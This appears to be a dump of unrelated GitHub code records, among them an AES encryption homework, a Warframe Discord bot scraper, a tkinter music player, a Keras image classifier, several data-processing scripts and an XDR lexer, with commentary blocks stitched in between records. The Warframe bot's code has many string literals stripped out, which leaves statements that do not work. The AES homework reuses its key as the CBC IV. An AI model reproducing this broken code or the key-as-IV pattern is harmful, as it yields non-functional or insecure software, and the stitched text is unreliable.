byte_xor(ba1, ba2):\n return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])\n\n\nECB = 'ECB'\nCBC = 'CBC'\nCUSTOM = 'CST'\n\n\nif __name__ == '__main__':\n mode = input('輸入加密的Mode: ')\n\n path = Path(__file__).parent / 'mypppm.ppm'\n im = Image.open(path)\n img_byte_array = io.BytesIO()\n im.save(img_byte_array, format=im.format)\n img_byte_array = img_byte_array.getvalue()\n\n if mode == ECB:\n encrypt_aes = EncryptAES(encrypt_mode=ECB)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CBC:\n encrypt_aes = EncryptAES(encrypt_mode=CBC)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CUSTOM:\n encrypt_aes = EncryptAES(encrypt_mode=CUSTOM)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n","repo_name":"ImJsaw/Information_Security_Class","sub_path":"Hw3/EncryptAES.py","file_name":"EncryptAES.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
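The custom mode above varies the chaining block per key bit; chaining matters in the first place because ECB maps equal plaintext blocks to equal ciphertext blocks. A small PyCryptodome demonstration (note it draws the IV independently, whereas the record reuses the key as the IV, a practice real CBC deployments avoid):

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

key = get_random_bytes(16)
iv = get_random_bytes(16)      # independent of the key, unlike the record
plaintext = b"A" * 16 * 2      # two identical 16-byte blocks

ecb = AES.new(key, AES.MODE_ECB).encrypt(plaintext)
cbc = AES.new(key, AES.MODE_CBC, iv).encrypt(plaintext)

print(ecb[:16] == ecb[16:])  # True  -> ECB leaks the repetition
print(cbc[:16] == cbc[16:])  # False -> chaining hides it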
+{"seq_id":"38017883261","text":"import discord\r\nimport datetime\r\n\r\nfrom CobraLib import source_html\r\nfrom StorageConfig import Traduction\r\n\r\ndef ressource(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n pos = 0\r\n zone = data_html[data_html.find(\"Resource Drops by Resource:\"):data_html.find(\"Sigil Drops by Enemy:\")].lower()\r\n if zone.count(item) != 0:\r\n tab = '**' + zone[zone.find(item + '
'):zone.find(\r\n '
',\r\n zone.find(item + '
'))].replace('
', '**\\n__').capitalize().replace(\r\n '
', '__\\t\\t\\t__').replace('
', '__\\n```diff\\n').replace('
',\r\n '\\t').replace(\r\n '
', '\\n') + '```'\r\n zone = data_html[data_html.find(\"Missions:\"):data_html.find(\"Relics:\")].lower()\r\n if zone.count(item) != 0:\r\n Mission = '?????????'\r\n Rotation = '????????????'\r\n MissionLimit1 = '
', '\\n') + '```'\r\n if tab == \"**```\" and \"blueprint\" not in item:\r\n args.append(\"blueprint\")\r\n return ItemDrops(args)\r\n elif tab == \"**```\":\r\n return Traduction.bug(item)\r\n else:\r\n return tab\r\n\r\ndef mods(args):\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n modslist = source_html('https://wf.snekw.com/mods-wiki').lower()\r\n if modslist.count(item) == 0:\r\n return Traduction.bug(item)\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n zone = data_html[data_html.find(\"Mod Drops by Mod:\"):data_html.find(\"Blueprint/Item Drops by Enemy:\")].lower()\r\n if zone.count(item) >= 1:\r\n tab = '**' + zone[zone.find(item + '
'):zone.find(\r\n '
',\r\n zone.find(item + '
'))].replace('
', '**\\n__').capitalize().replace(\r\n '
', '__\\t\\t\\t__').replace('
', '__\\n```diff\\n').replace('
',\r\n '\\t').replace(\r\n '
', '\\n') + '```\\n'\r\n data_html = source_html(\"https://drops.warframestat.us/data/all.json\").lower()\r\n if data_html.count(item) >= 1:\r\n tab = tab + '**' + item.capitalize() + '**\\n'\r\n posData = 0\r\n for i in range(0, data_html.count(item)):\r\n posData = data_html.find(item, posData + len(item))\r\n Objectivename = data_html[\r\n data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'):data_html.find(\r\n '\"', data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'))]\r\n if Objectivename == 'ds':\r\n zoneb = data_html[data_html.rfind(\"}]\", 0, posData):data_html.rfind(\":[{\", 0, posData)]\r\n MissionName = zoneb[zoneb.find('\"') + 1:zoneb.find('\"', zoneb.find('\"') + 2)]\r\n gamemode = zoneb[zoneb.find('{\"gamemode\":\"') + len('{\"gamemode\":\"'):zoneb.find('\"', zoneb.find(\r\n '{\"gamemode\":\"') + len('{\"gamemode\":\" '))]\r\n if MissionName == 'c' or MissionName == 'b' or MissionName == 'a':\r\n MissionName2=data_html[data_html.rfind('\"',0,data_html.rfind('\":{\"ga',0,posData))+1:data_html.rfind('\":{\"ga',0,posData)].capitalize()\r\n gamemode=data_html[data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'):data_html.find('\"',data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'))].capitalize()\r\n MissionName = 'Rotation ' + MissionName\r\n MissionName=MissionName2.capitalize()+'\\n'+MissionName\r\n Objectivename = '\\n**' + MissionName + '** : ' + gamemode.capitalize()\r\n chancedrop = data_html[data_html.find('\"chance\":', posData) + len('\"chance\":'):data_html.find('}',\r\n data_html.find(\r\n '\"chance\":',\r\n posData) + len(\r\n '\"chance\":'))]\r\n tab = tab + Traduction.FindHere() + Objectivename + '\\nDrop Chance: ' + chancedrop + '\\n'\r\n if len(tab) >= 1750:\r\n return tab[:1900 ].replace('%)', \"%)\\n\") + '\\nAnd more...', 'message.author'\r\n if not tab == \"\":\r\n return tab,\"msg\"\r\n else:\r\n return Traduction.bug(item),\"msg\"","repo_name":"typlosion14/WarframeBot","sub_path":"resources/official.py","file_name":"official.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
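The drop-table lookup above slices raw HTML with inline tag delimiters (several of those string literals did not survive in this copy of the record). A parser-based pass is more robust to markup changes; the sketch below assumes the page lays items out as table headers followed by source/chance rows, which is an assumption about the page, not something the record confirms.

import requests
from bs4 import BeautifulSoup

URL = "https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html"

def find_drops(item_name):
    soup = BeautifulSoup(requests.get(URL).text, "html.parser")
    drops = []
    for th in soup.find_all("th"):
        if item_name.lower() in th.get_text(strip=True).lower():
            # walk the rows that follow the matched header (assumed layout)
            for row in th.find_parent("tr").find_next_siblings("tr"):
                cells = [td.get_text(strip=True) for td in row.find_all("td")]
                if not cells:  # a header-only row ends this item's section
                    break
                drops.append(cells)
    return drops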
+{"seq_id":"33574452494","text":"from tkinter import *\r\nfrom tkinter import filedialog as fd\r\nimport os\r\nimport vlc\r\nimport random\r\n\r\nInstance = vlc.Instance()\r\nplayer = Instance.media_player_new()\r\n\r\nafter_id = ''\r\n\r\nclass Music():\r\n song_name = ''\r\n random_song = False\r\n ext_list = ['.mp3', '.wav', '.ogg']\r\n player_volume = 50\r\n\r\n def change_random(self):\r\n self.random_song = not self.random_song\r\n if self.random_song: prevMusicButton['state'] = 'disabled'\r\n else: prevMusicButton['state'] = 'active'\r\n\r\n def switch_file(filepath, prev):\r\n directory = os.path.dirname(filepath)\r\n filename = os.path.basename(filepath)\r\n fileList = os.listdir(directory)\r\n if prev: nextIndex = fileList.index(filename) - 1\r\n else: nextIndex = fileList.index(filename) + 1\r\n if nextIndex == len(fileList):\r\n nextIndex = 0\r\n nextpath = directory + '/' + fileList[nextIndex]\r\n return nextpath\r\n \r\n def random_file(self, filepath):\r\n directory = os.path.dirname(filepath)\r\n filename = os.path.basename(filepath)\r\n fileList = os.listdir(directory)\r\n nextIndex = random.randint(0, len(fileList) - 1)\r\n nextpath = directory + '/' + fileList[nextIndex]\r\n if nextpath == filepath: self.random_file(self, filepath)\r\n return nextpath\r\n\r\n def start_player(self):\r\n self.stop_player()\r\n\r\n self.song_name = fd.askopenfilename(title = 'Выберите музыку')\r\n nowPlaying['text'] = os.path.basename(self.song_name)\r\n Media = Instance.media_new(self.song_name)\r\n Media.get_mrl()\r\n player.set_media(Media)\r\n player.play() \r\n player.audio_set_volume(self.player_volume) \r\n\r\n def next_song(self, prev):\r\n Music.skip_not_music(self, prev)\r\n nowPlaying['text'] = os.path.basename(self.song_name)\r\n Media = Instance.media_new(self.song_name)\r\n Media.get_mrl()\r\n player.set_media(Media)\r\n player.play() \r\n player.audio_set_volume(self.player_volume)\r\n\r\n def skip_not_music(self, prev):\r\n if self.random_song:\r\n self.song_name = self.random_file(self, self.song_name)\r\n else:\r\n self.song_name = self.switch_file(self.song_name, prev)\r\n ext = os.path.splitext(self.song_name)[-1].lower()\r\n if ext not in self.ext_list:\r\n self.next_song(self, prev)\r\n \r\n def change_volume(self, minus):\r\n if minus: \r\n if self.player_volume - 10 >= 0: self.player_volume -= 10\r\n else: self.player_volume += 10\r\n volumeLabel['text'] = \"Громкость: \" + str(self.player_volume)\r\n player.audio_set_volume(self.player_volume)\r\n\r\n def stop_player():\r\n player.stop()\r\n nowPlaying[\"text\"] = \"Сейчас ничего не играет\"\r\n\r\ngui = Tk()\r\ngui.geometry('500x250')\r\ngui.configure(background = '#333333')\r\ngui.resizable(width=True, height=False) \r\n\r\nframe_top = Frame(background = '#111111')\r\nframe_mid = Frame(background = '#555555')\r\n\r\nframe_midtop = Frame(frame_mid, background = '#555555')\r\nframe_midmid = Frame(frame_mid, background = '#555555')\r\nframe_midbot = Frame(frame_mid, background = '#555555')\r\n\r\nstartMusicButton = Button(frame_top, text = \"Включить\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#111111\",\r\n font=('Comic Sans MS', 20),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.start_player(Music)))\r\npauseMusicButton = Button(frame_midbot, text = \"▍▍\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font=20,\r\n fg = '#EEEEEE',\r\n command = lambda: (player.pause()))\r\nprevMusicButton = Button(frame_midbot, text = \"🡸\",\r\n highlightthickness = 0, bd = 0,\r\n 
background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.next_song(Music, True)))\r\nnextMusicButton = Button(frame_midbot, text = \"🡺\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.next_song(Music, False)))\r\nstopMusicButton = Button(frame_top, text = \"Выключить\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#111111\",\r\n font=('Comic Sans MS', 20),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.stop_player()))\r\nrandomCheck = Checkbutton(frame_top, text='Перемешать треки',\r\n background = \"#111111\",\r\n font=('Comic Sans MS', 10),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.change_random(Music)))\r\nvolumeScaleMinus = Button(frame_midmid, text = \"-\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n fg = '#EEEEEE',\r\n font = 20,\r\n command = lambda: (Music.change_volume(Music, True)))\r\nvolumeScalePlus= Button(frame_midmid, text = \"+\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.change_volume(Music, False)))\r\n\r\nvolumeLabel = Label(frame_midmid, background = \"#555555\", text = 'Громкость: 50', font=('Comic Sans MS', 10), fg = '#EEEEEE')\r\nnowPlaying = Label(frame_midtop, background = \"#555555\", text = 'Сейчас ничего не играет', font=('Comic Sans MS', 10), fg = '#EEEEEE', width = 200)\r\n\r\nframe_top.pack(side = 'top', fill = 'both')\r\nstartMusicButton.pack(side = 'left')\r\nstopMusicButton.pack(side = 'left')\r\nrandomCheck.pack(side = 'left')\r\n\r\nframe_mid.pack(side = 'left')\r\n\r\nframe_midtop.pack(side = 'top')\r\nnowPlaying.pack(side = 'left', fill = 'x')\r\n\r\nframe_midmid.pack(side = 'top')\r\nvolumeScaleMinus.pack(side = 'left')\r\nvolumeLabel.pack(side = 'left')\r\nvolumeScalePlus.pack(side = 'left')\r\n\r\nframe_midbot.pack(side = 'top')\r\npauseMusicButton.pack(side = 'left')\r\nprevMusicButton.pack(side = 'left')\r\nnextMusicButton.pack(side = 'left')\r\n\r\ngui.mainloop()","repo_name":"CharaFour/Dont-open","sub_path":"opmain.py","file_name":"opmain.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"8135969840","text":"import numpy as np\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Input, MaxPooling2D, LeakyReLU, Softmax, GlobalAveragePooling2D, BatchNormalization, Dropout \r\nfrom tensorflow.keras.models import Sequential, Model, load_model, save_model\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport pandas as pd\r\n#1. DATA\r\n#.npy Load\r\nx = np.load('../../data/npy/LPD_train_x1.npy', allow_pickle=True)\r\ny = np.load('../../data/npy/LPD_train_y1.npy', allow_pickle=True)\r\ntarget = np.load('../../data/npy/target1.npy', allow_pickle=True)\r\n\r\nfrom tensorflow.keras.applications.efficientnet import preprocess_input\r\nx = preprocess_input(x)\r\ntarget = preprocess_input(target)\r\n\r\n# print(x.shape)\r\n# print(y.shape)\r\n# print(target.shape)\r\n\r\n#generagtor\r\nidg = ImageDataGenerator(\r\n zoom_range = 0.1,\r\n height_shift_range=0.1,\r\n width_shift_range=0.1,\r\n rotation_range=32 \r\n)\r\n\r\nidg2 = ImageDataGenerator()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_val, y_train, y_val = train_test_split(x, y, train_size = 0.9, random_state = 128, shuffle = True)\r\n\r\n#control\r\nimage_size = (128, 128, 3)\r\nbts = 32\r\noptimizer = Adam(learning_rate = 1e-3)\r\n\r\ntrain_generator = idg.flow(x_train, y_train, batch_size = bts, seed=1024)\r\nvalid_generator = idg2.flow(x_val, y_val)\r\ntest_generator = idg2.flow(target)\r\n\r\n#2. MODEL\r\nfrom tensorflow.keras.applications import EfficientNetB5\r\nTF = EfficientNetB5(weights=\"imagenet\", include_top=False, input_shape = image_size) \r\nTF.trainable = True\r\nx = TF.output\r\nx = GlobalAveragePooling2D()(x)\r\nx = Flatten()(x)\r\nx = Dense(2048, activation='relu')(x)\r\noutputs = Dense(1000, activation='softmax')(x)\r\nmodel = Model(inputs = TF.input, outputs = outputs)\r\nmodel.summary()\r\n\r\n#COMPILE \r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\r\nmodel.compile(loss = 'categorical_crossentropy', optimizer = optimizer, metrics = ['acc'])\r\nmc = ModelCheckpoint('C:/data/MC/best_LT_vision2_{epoch:02d}-{val_loss:.4f}.hdf5', save_best_only=True, mode = 'auto')\r\nes = EarlyStopping(monitor='val_loss', patience=5, verbose=1, mode='auto')\r\nrl = ReduceLROnPlateau(monitor='val_loss', factor=0.3, patience=3, verbose=1, mode='auto')\r\nmodel.fit_generator(train_generator, epochs=100, verbose=1, validation_data= valid_generator, callbacks=[es, rl, mc])\r\n\r\nmodel.save('C:/data/h5/LT_vision_model2_3.h5')\r\nmodel.save_weights('C:/data/h5/LT_vision_3.h5')\r\n# model = load_model('C:/data/h5/fish_model2.h5')\r\n# model.load_weights('C:/data/h5/fish_weight.h5')\r\n\r\n#EVAL\r\nloss, acc = model.evaluate(valid_generator)\r\nprint(\"loss : \", loss)\r\nprint(\"acc : \", acc)\r\n\r\nresult = pd.read_csv(\"C:/data/LPD_competition/sample.csv\")\r\n\r\n# prd = model.predict(x_test)\r\n# filenames = xy_test.filenames\r\n# nb_samples = len(filenames)\r\n# print(nb_samples)\r\nprd = model.predict_generator(test_generator, steps=72000)\r\na = pd.DataFrame()\r\nprd = pd.Series(np.argmax(prd,axis=-1))\r\nprd = pd.concat([a,prd],axis=1)\r\nresult.iloc[:,1] = 
prd.sort_index().values\r\nresult.to_csv('C:/data/LPD_competition/sample_2.csv')","repo_name":"TaeYeon-kim-ai/STUDY_1.py","sub_path":"dacon/lotte_vision_1/LT_model10_Effition_B5.py","file_name":"LT_model10_Effition_B5.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"71246478122","text":"#! /usr/bin/env python\n\nimport re\nimport sys\n\nimport xml.etree.ElementTree as ET\nimport xml.parsers.expat as expat\n\ndoc = sys.argv[1]\nlang = sys.argv[2]\ninput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'.xml'\noutput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'-back.lyx'\n\nsentence_end_re=re.compile('([!?]|[^.][.]|[\\n])')\nheader = False\ntext = ''\ndef write_sentence(s):\n max_len = 78\n while len(s) > max_len:\n split = s.rfind(' ', 0, max_len)\n if split >= 0:\n output_file.write(s[:split]+'\\n')\n s = s[split:]\n else:\n break\n output_file.write(s.rstrip('\\n')+'\\n')\ndef write_text():\n global text\n if len(text) > 0:\n # split on end of sentences\n splitted = sentence_end_re.split(text.rstrip('\\n'))\n while len(splitted) > 1:\n sentence = splitted[0]+splitted[1]\n write_sentence(sentence)\n splitted = splitted[2:]\n if len(splitted) == 1:\n if splitted[0] != '':\n write_sentence(splitted[0])\n text = ''\ndef comment(data):\n write_text()\n\n output_file.write('#'+data+'\\n')\ndef start_element(name, attrs):\n global header\n write_text()\n\n # special tags\n if name == 'lyx2xml':\n return\n if name == 'empty_line':\n output_file.write('\\n')\n return\n if name == '__param':\n start_tab = attrs.pop('start_tab')\n if start_tab == \"True\":\n output_file.write('\\t')\n value_present = attrs.pop('value_present')\n if value_present == \"True\":\n param = ' '.join([k+' '+v for (k, v) in attrs.items()])\n else:\n param = ' '.join([k for k in attrs.keys()])\n output_file.write(param+'\\n')\n return\n\n # xml-like structure\n if name.startswith('__'):\n if len(attrs) > 0:\n param = ' '.join([k+'=\"'+v+'\"' for (k, v) in attrs.items()])\n output_file.write('<'+name[2:]+' '+param+'>\\n')\n else:\n output_file.write('<'+name[2:]+'>\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = True\n output_file.write('\\\\begin'+name)\n else:\n output_file.write('\\\\'+name)\n if len(attrs) > 0:\n output_file.write(' '+' '.join(attrs.values())+'\\n')\n else:\n output_file.write('\\n')\ndef end_element(name):\n global header\n write_text()\n\n # special tags\n if name == '__param':\n return\n\n # xml-like structure\n if name.startswith('__'):\n if name[2:] not in ('features', 'column'):\n output_file.write(''+name[2:]+'>\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = False\n output_file.write('\\\\end'+name+'\\n')\ndef char_data(data):\n global text\n global header\n if header is True:\n output_file.write(data.replace('',''))\n return\n\n if len(text) == 0:\n if data == '\\n':\n return\n text += data.replace('','')\n\nwith open(output_filename, 'w') as output_file:\n p = expat.ParserCreate()\n\n p.CommentHandler = comment\n p.StartElementHandler = start_element\n p.EndElementHandler = end_element\n p.CharacterDataHandler = char_data\n \n with open(input_filename, 'rb') as input_file:\n p.ParseFile(input_file)\n","repo_name":"EricSeynaeve/landwijzer_werkstuk","sub_path":"bin/xml2lyx.py","file_name":"xml2lyx.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"952276593","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport re\nimport stat\n\nusage_mesg = 'Usage: prepare-tandemK-high.py '\n\nmzXML_dir = sys.argv[1]\nfilename_fasta_pro = sys.argv[2]\ndb_name = re.sub('.pro$','', os.path.basename(filename_fasta_pro))\ndb_name = re.sub('.fasta$','',db_name)\ndb_name = re.sub('.fa$','',db_name)\n\nabs_path_script = os.path.abspath(__file__)\nMSTB_HOME = os.path.abspath( os.path.join(abs_path_script, '..', '..') )\n\nfilename_taxon_xml = 'tandem-taxonomy.xml'\nfilename_taxon_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_taxon_xml)\n\nfilename_tandem_xml = 'tandemK.low.xml'\nfilename_in_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_tandem_xml)\n\nfilename_sh = 'run-tandemK.sh'\nfilename_tandem_exe = os.path.join(MSTB_HOME,'extern','tandem.linux.exe') \nfilename_default_xml = os.path.join(MSTB_HOME,'search','isb_default_input_kscore.xml')\n\nf_taxon_tmpl = open(filename_taxon_tmpl,'r')\ntaxon_tmpl = ''.join( f_taxon_tmpl.readlines() )\nf_taxon_tmpl.close()\n\nsys.stderr.write('Write %s.\\n'%filename_taxon_xml)\nf_taxon = open(filename_taxon_xml,'w')\nf_taxon.write( taxon_tmpl.format(DB_FASTAPRO=filename_fasta_pro, DB_NAME=db_name) )\nf_taxon.close()\n\nf_in_tmpl = open(filename_in_tmpl,'r')\nin_tmpl = ''.join( f_in_tmpl.readlines() )\nf_in_tmpl.close()\n\nf_sh = open(filename_sh,'w')\nf_sh.write('#!/bin/bash\\n')\nfor filename in os.listdir(mzXML_dir):\n if( not filename.upper().endswith('.MZXML') ):\n continue\n filename_base = '.'.join(filename.split('.')[:-1])\n filename_in = '%s.%s.tandemK.xml'%(filename_base,db_name)\n\n in_params = dict()\n in_params['DB_NAME'] = db_name\n in_params['TANDEMK_DEFAULT_PARAM'] = filename_default_xml\n in_params['FILENAME_TAXON'] = filename_taxon_xml\n in_params['FILENAME_MZXML'] = os.path.abspath(os.path.join(mzXML_dir, filename))\n filename_out = '%s.%s.tandemK.out'%(filename_base,db_name)\n in_params['FILENAME_OUT'] = filename_out\n in_params['FILENAME_LOG'] = '%s.%s.tandemK.log'%(filename_base,db_name)\n\n sys.stderr.write('Write %s.\\n'%filename_in)\n f_in = open(filename_in,'w')\n f_in.write( in_tmpl.format(**in_params) )\n f_in.close()\n \n f_sh.write(\"%s %s\\n\"%(filename_tandem_exe, filename_in))\nf_sh.close()\n\nos.chmod(filename_sh,stat.S_IRWXU)\nsys.stderr.write('\\nTandemK is ready. Run %s.\\n\\n'%(filename_sh))\n","repo_name":"marcottelab/MSblender","sub_path":"msblender-scripts/prepare-tandemK-low.py","file_name":"prepare-tandemK-low.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"22187868104","text":"\"\"\"MNIST dataset generation and dataloader\r\n\"\"\"\r\n\r\nimport torch\r\nimport torchvision\r\nimport numpy as np\r\nfrom .utils_dataset import TransformsDataset\r\n\r\nclass ToBinary(object):\r\n def __init__(self, class_0):\r\n self.class_0 = class_0\r\n \r\n def __call__(self, label):\r\n return np.float32([not (label == self.class_0)])\r\n \r\n def __repr__(self):\r\n return self.__class__.__name__ + '()'\r\n\r\nclass Subset(torch.utils.data.sampler.SubsetRandomSampler):\r\n def __iter__(self):\r\n return (self.indices[i] for i in range(len(self.indices)))\r\n \r\ndef get_dataloaders(opt, mode):\r\n mode_ = 'train' if mode=='train' else opt.split_validation\r\n mnist_dataset = torchvision.datasets.MNIST('./', train=mode_!='test', download=True,\r\n transform=torchvision.transforms.Compose([\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(\r\n (0.5,), (0.5,))\r\n ]))\r\n \r\n valid_size = 0.1\r\n num_train = len(mnist_dataset)\r\n indices = []\r\n \r\n # only using the two selected classes\r\n for i in range(len(mnist_dataset)):\r\n if mnist_dataset[i][1] in [opt.class_0_mnist, opt.class_1_mnist]:\r\n indices.append(i)\r\n \r\n if mode_!='test':\r\n valid_size = 0.1\r\n num_train = len(indices)\r\n split = int(valid_size * num_train)\r\n # get a fixed random validation set for every run\r\n np.random.RandomState(0).shuffle(indices)\r\n indices = {'train':indices[split:], 'val':indices[:split]}[mode_]\r\n \r\n mnist_dataset = TransformsDataset(mnist_dataset, ToBinary(opt.class_0_mnist), i=1)\r\n if mode=='train':\r\n sampler = torch.utils.data.sampler.SubsetRandomSampler\r\n else:\r\n sampler = Subset\r\n \r\n return torch.utils.data.DataLoader(mnist_dataset, \r\n batch_size=opt.batch_size, sampler=sampler(indices), num_workers=0)","repo_name":"ricbl/gradient-direction-of-robust-models","sub_path":"src/direct_method/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"8504655862","text":"from django.urls import path\n\nfrom advanced_report_builder.views.datatables import TableModal, FieldModal\n\napp_name = 'report_builder'\n\n\nurlpatterns = [\n path('table/modal//', TableModal.as_view(), name='table_modal'),\n path('table/modal/field//', FieldModal.as_view(), name='field_modal'),\n]\n","repo_name":"nagwagabr74/plots","sub_path":"env/Lib/site-packages/advanced_report_builder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1409189138","text":"# SPDX-License-Identifier: LGPL-2.1-or-later\n\nimport abc\n\n\nclass XDRReader:\n def __init__(self, fp):\n self.fp = fp\n self.lookahead = \"\"\n self.lookbehind = \"\"\n self.line = 1\n self.column = 0\n\n def _read(self):\n if len(self.lookahead) > 0:\n c = self.lookahead[0:1]\n self.lookahead = self.lookahead[1:]\n return c\n return self.fp.read(1)\n\n def peek(self, skip=0):\n need = 1 + skip\n if len(self.lookahead) < need:\n self.lookahead = self.lookahead + self.fp.read(need - len(self.lookahead))\n if len(self.lookahead) < need:\n return None\n\n return self.lookahead[skip : skip + 1]\n\n def last(self, skip=0):\n if (skip + 1) > len(self.lookbehind):\n return None\n return self.lookbehind[skip]\n\n def next(self):\n c = self._read()\n line = self.line\n column = self.column\n if c == \"\\n\":\n self.line = self.line + 1\n self.column = 0\n else:\n self.column = self.column + 1\n self.lookbehind = c + self.lookbehind\n if len(self.lookbehind) > 2:\n self.lookbehind = self.lookbehind[0:2]\n return c, line, column\n\n\nclass XDRToken(abc.ABC):\n def __init__(self, line, column, value):\n self.line = line\n self.column = column\n self.value = value\n\n def __eq__(self, other):\n return (\n type(self) is type(other)\n and self.line == other.line\n and self.column == other.column\n and self.value == other.value\n )\n\n @classmethod\n @abc.abstractmethod\n def start(cls, reader):\n pass\n\n @classmethod\n @abc.abstractmethod\n def end(cls, reader):\n pass\n\n @classmethod\n def consume(cls, reader):\n c, line, col = reader.next()\n buf = c\n while True:\n if cls.end(reader):\n break\n c, _, _ = reader.next()\n buf = buf + c\n return cls(line, col, buf)\n\n def __repr__(self):\n return \"%s{line=%d,col=%d,value={{{%s}}}}\" % (\n self.__class__.__name__,\n self.line,\n self.column,\n self.value,\n )\n\n\nclass XDRTokenComment(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek() == \"/\" and reader.peek(skip=1) == \"*\"\n\n @classmethod\n def end(cls, reader):\n c1 = reader.last(skip=1)\n c2 = reader.last()\n if c1 == \"*\" and c2 == \"/\":\n return True\n\n if reader.peek() is None:\n raise Exception(\n \"EOF before closing comment starting at %d:%d\"\n % (reader.line, reader.column)\n )\n\n\nclass XDRTokenIdentifier(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c.isalpha()\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n if c is None:\n return True\n return not c.isalnum() and c != \"_\"\n\n\nclass XDRTokenPunctuation(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c in [\";\", \"=\", \"{\", \"}\", \",\", \"[\", \"]\", \"<\", \">\", \"*\", \"(\", \")\", \":\"]\n\n @classmethod\n def end(cls, reader):\n return True\n\n\nclass XDRTokenConstant(XDRToken):\n @classmethod\n def start(cls, reader):\n c1 = reader.peek()\n c2 = reader.peek(skip=1)\n return c1.isdecimal() or (c1 == \"-\" and c2 is not None and c2.isdecimal())\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return (\n not c.isdecimal()\n and not c == \".\"\n and not c.lower() in [\"x\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n )\n\n\nclass XDRTokenCEscape(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.column == 0 and reader.peek() == \"%\"\n\n @classmethod\n def end(cls, reader):\n return reader.peek() == \"\\n\"\n\n\nclass XDRTokenSpace(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek().isspace()\n\n @classmethod\n def end(cls, 
